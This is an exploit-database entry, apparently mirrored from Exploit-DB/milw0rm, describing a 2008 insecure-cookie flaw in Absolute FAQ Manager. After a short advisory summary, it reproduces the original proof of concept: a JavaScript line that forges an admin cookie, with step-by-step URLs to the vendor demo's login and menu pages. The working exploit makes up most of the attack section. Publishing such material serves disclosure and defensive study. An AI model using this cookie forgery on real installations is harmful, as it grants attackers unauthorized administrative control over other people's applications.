header-logo
Suggest Exploit
vendor:
Absolute FAQ Manager
by:
Hakxer
7.5
CVSS
HIGH
Insecure Cookie Vulnerability
200
CWE
Product Name: Absolute FAQ Manager
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Absolute FAQ Manager Insecure Cookie Vulnerability

Absolute FAQ Manager is prone to an insecure cookie vulnerability. An attacker can exploit this issue to gain administrative access to the application. The attacker can exploit this issue by executing a specially crafted JavaScript code.

Mitigation:

No known mitigation is available at this time.
Source

Exploit-DB raw data:

#####################################################################################
# Discovered by : Hakxer                                                            #
# Script : Absolute FAQ Manager http://www.xigla.com/absolutefmnet/demo.htm         #
# Greetz : Allah , All My friend ,www.educ-up.com                                   #
# -------------------------------                                                   #
# Poc :                                                                             #
# javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s=";                   #
#                                                                                   #
# [~] Exploit                                                                       #
#                                                                                   #
# Go To admin login : http://www.xigla.com/absolutefmnet/demo/login.aspx            #
# Execute JS Code : javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s="; #
# Now Go to :http://www.xigla.com/absolutefmnet/demo/menu.aspx                      #
# 								                    #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )                    #
#####################################################################################

# milw0rm.com [2008-10-31]